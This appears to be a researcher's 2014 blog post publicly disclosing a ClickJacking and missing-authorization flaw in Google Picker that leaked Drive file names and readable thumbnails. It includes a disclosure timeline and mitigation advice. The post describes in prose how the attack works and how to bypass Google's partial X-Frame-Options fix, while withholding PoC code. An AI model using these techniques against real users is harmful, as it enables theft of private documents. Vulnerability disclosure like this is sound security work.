ClickJacking vulnerability leads to information leakage in Google Drive

This blog post reports on a ClickJacking vulnerability in Google Drive, which has not been fixed in more than 5 months. I will discuss how this vulnerability was discovered in a semi-automated fashion, what caused the vulnerability and how Google should/could have fixed it.

In an attempt to live up to Mr. Curtis “50 Cent” Jackson’s life guidance (Get Rich Or Die Tryin’), I wanted to come up with something that automated much of the checks I did when hunting bugs manually. One of these checks is to verify whether web pages send out the correct security headers. A header that should be on every web page containing a form which initiates a state-change, is X-Frame-Options. By sending out this header on a web page, a website operator can protect his users against ClickJacking vulnerabilities.

NOTE: X-Frame-Options is not the only mechanism to protect against ClickJacking, the frame-ancestors directive of CSP does this as well.

Hustler’s Ambition

As the amount of time I had for creating this was rather limited, I decided to implement this mechanism as a browser plugin, which logs all pages that contain a form and don’t send out the X-Frame-Options header. As I regularly use the websites that are subject to my analysis, all I had to do now was wait and keep going ‘til I hit the spot.

NOTE: I assumed that only pages with forms would be vulnerable to ClickJacking attacks, but this might not always be the case.

A few weeks later, I started analysing the log files to check if I had hit something. After going through some false positives (Google Maps, Google Sites, forms on Google Docs, …), I found something interesting: Google Picker.

Google Picker is a “File Open” dialog for the information stored in Google servers.

With Google Picker, your users can select photos, videos, maps, and documents stored in Google servers. The selection is passed back to your web page or web application for further use.

Use Google Picker to let users:

  • Access their files stored across Google services.

  • Upload new files to Google, which they can use in your application.

  • Select any image or video from the Internet, which they can use in your application.

So, you select your files from Google, and send information about them to a third party. I would assume that as a user, I would have to give some permission for a third party to get information on my private files, or that I at least would clearly see what I was doing, right? Right?!

Window Shopper

So here’s what we know: the Google Picker page can be framed and some information about selected files is sent to the parent. By analysing the Google Picker tool, I quickly found that the information was sent cross-origin, by using the postMessage-mechanism. You can read all about this mechanism on MDN, but basically when there are two windows, the one can use otherWindow.postMessage(message, targetOrigin, [transfer]) to send a message. If otherWindow is listening (via window.addEventListener("message", ...)), it will be able to receive the message.

Google Picker determines the target origin and window based on a parameter in the URL. Setting this parameter to the desired attack domain, will take you to the candy shop. Playing a bit with the parameters I managed to just show pdf files, as these are most likely to be sensitive. This is the page that will be framed: [Redacted]

Now let’s see what data is sent to the attacker through postMessage:

    "s": "picker",
    "f": "",
    "c": 0,
    "a": [{
        "action": "picked",
        "viewToken": ["pdfs", null, {
            "mode": "list"
        "docs": [{
            "id": "0B2QAJJg95dkIRGxsSHd3YzRtbWc",
            "serviceId": "DoclistBlob",
            "mimeType": "application/pdf",
            "name": "S3CR3T.pdf",
            "type": "document",
            "lastEditedUtc": 1379511652399,
            "iconUrl": "",
            "description": "",
            "url": "",
            "embedUrl": "",
            "thumbnails": [{
                "url": "",
                "width": 32,
                "height": 32
            }, {
                "url": "",
                "width": 64,
                "height": 64
            }, {
                "url": "",
                "width": 72,
                "height": 72
            }, {
                "url": ""
            "sizeOnDisk": 0
        "view": "pdfs"
    "l": false,
    "g": true,
    "r": ""

There are two interesting pieces of data here: the name of a file and its thumbnails. One could argue that the name of a file is not that sensitive, but I’d rather not have a stranger going through the names of my files I stored on Google Drive. And what about thumbnails? An attacker can’t do anything with these as Google would only allow the owner (and the people the file is shared with) to view the thumbnail, right? Right?!

Outta Control

As you might have guessed, Google fails to verify whether a user is authorized to view the (sensitive) thumbnail. Hell, they even allow unauthenticated access to the thumbnail! At the time of writing, this is still not fixed. A thumbnail -actually a clear snapshot of the first page of the document, see example - for the selected pdf file is publicly available for 1-2 hours, allowing more than enough time for the attacker to download the file.

OWASP names this type of vulnerability Insecure Direct Object References, and it comes as no surprise that it is listed at number 4 of the OWASP Top Ten for 2013, just after XSS.

Interestingly, Google has been aware for quite some time that these thumbnails may be sensitive. On the Google Picker API forums, Jon Emerson (Engineering Manager at Google) says:


I dug into this for you, and here’s what I found: The expiration & cookie enforcement is a deliberate choice by the Google Docs folks:

The thumbnails are technically resizable so you can get a 2048x2048 version of the document. At that resolution, you can read the document, which would be really bad if it’s a private document you didn’t intend to share with people. To protect user’s security, we therefore restrict who can view thumbnails, and we also expire them in case cookies leak.


He was only partially correct. Google does restrict who can view thumbnails, but that’s only the case for documents created by Google Drive (Document, Presentation, Spreadsheet, …). Looks like the previous comment in the thread, where a guy says the thumbnail only gives a 403 response on half of the files, did not ring a bell something was wrong.

Also, according to Kuntal Loya, Software Engineer at Google, the thumbnails for Google Drive items would no longer be returned by Feb 7, 2013. That is more than one year ago.

To make matters worse, when I first reported this vulnerability on September 18th, 2013, I soon got a reply that the issue I reported is a duplicate, which means that I’m not the first one who reported this. And as I found this vulnerability in a semi-automated way, I’m quite confident to say that for an attacker, finding this vulnerability is child’s play. This is the main reason that I’m publicly disclosing this vulnerability, in addition to Google’s stance on responsible disclosure, which clearly states the following:

Whilst every bug is unique, we would suggest that 60 days is a reasonable upper bound for a genuinely critical issue in widely deployed software. This time scale is only meant to apply to critical issues.

While this vulnerability may not be marked as “critical”, it is still quite serious in my opinion, given how easy it is for attackers to steal the contents of your private files. Even if Google didn’t manage to completely mitigate attacks in 4 months, at least they could have applied the correct authorization checks for thumbnails, or left out thumbnails completely as they said they would.

What Up Gangsta

Above, I mentioned that it is easy for an attacker to steal the sensitive data. You don’t have to hold my word on it, just see for yourself in this YouTube video I made when I initially reported the vulnerability to Google. In order to prevent giving script-kiddies all information required to set up their own ClickJacking page, I will not disclose the source code of the PoC until Google fixes this vulnerability.

The Google Picker API actually allows you to do a bunch of things, so I created another PoC which is more appealing to the creeps who are reading this. In case a user previously allowed access to his webcam, the user can now be targeted in a ClickJacking attack, which will activate the camera, record a movie, store it to Google Drive, and send a “thumbnail” to the attacker (again, this thumbnail is publicly available). You can view the PoC on YouTube.

Places To Go

I’ve shown you in detail the cause and consequences of this vulnerability, now I’ll discuss how it can be mitigated. Google has taken some “steps” already: the Google Picker page will now send out the X-Frame-Options header with the value DENY. A workaround for this is quite easy: adding &origin= to the URL. When this parameter is defined, the Google Picker page will send out X-Frame-Options: ALLOW-FROM My assumption here is that Google did this to keep track of hosts that (ab)use the Google Picker API. However, as some popular browsers (Chrome, Safari, Opera) don’t recognize the ALLOW-FROM directive, the value for the origin parameter can be random if the attacker doesn’t care about Firefox users.

There’s still a lot needed to get to a secure solution. The shift to require OAuth for authentication is a first step in the right direction, but as long as this is not enforced, it solves nothing. On Google Picker API forums, Kuntal Loya posted that by January 15th, 2014, Google Picker would stop working without an OAuth token. In the meanwhile, this has been postponed to April 15th, 2014. My assumption here is that some part of the Google Picker API is not completely compatible with OAuth yet, and Google favors availability over security. Given that millions of people have (sensitive) data hosted on Google Drive, while only tens/hundreds (based on the activity in Google Picker API forums) rely on the availability of the tool, I do not agree with this choice. Of course, I’m not a Google Employee so I’m unaware of any additional issues this shift might bring along.

Despite the difficulties of the shift towards OAuth, Google should’ve at least enforced authorization for thumbnails (or left out the thumbnails altogether) by now. They do it for “Google Drive documents”, why not do it for the rest of the files as well, it would certainly stop most hustlers!

Funny How Time Flies

  • September 18, 2013: Initial report sent to Google
  • September 19, 2013: Response from Google with notification that the report issue is a duplicate, and that they “expect a fix to be forthcoming”
  • October 1, 2013: Initial “fix”, requiring the origin parameter
  • December 9, 2013: Date to require OAuth set to January 15, 2014
  • February 3, 2014: Wrote this blog post, and notified Google
  • February 3, 2014: Date to require OAuth delayed to April 15, 2014
  • February 18, 2014: Publicly disclosed vulnerability

Previously, the public disclosure of a vulnerability I found in Google Scholar, resulted in a fix within one day. Although fixing the current issue seems to be more complex, I do hope that by publicly disclosing this information, it will considerably speed up the process. Given that the issue can be found in a semi-automated fashion, no steps were made to prevent unauthorized access to “thumbnails”, this vulnerability exists for at least 5 months, and that an actual fix has been postponed for 4 months, a fix is required sooner rather than later for this Sword of Damocles. For the time being, you may want to make sure that no sensitive information may leak through “thumbnails” of your files hosted by Google.

If you have remarks, or additional questions, feel free to contact me on Twitter!

UPDATE (February 20, 2014): Google has added a temporary mitigation by requiring OAuth for most origins. Although there are still a few exceptions, such as domains, this fix makes the vulnerability definitely harder to exploit.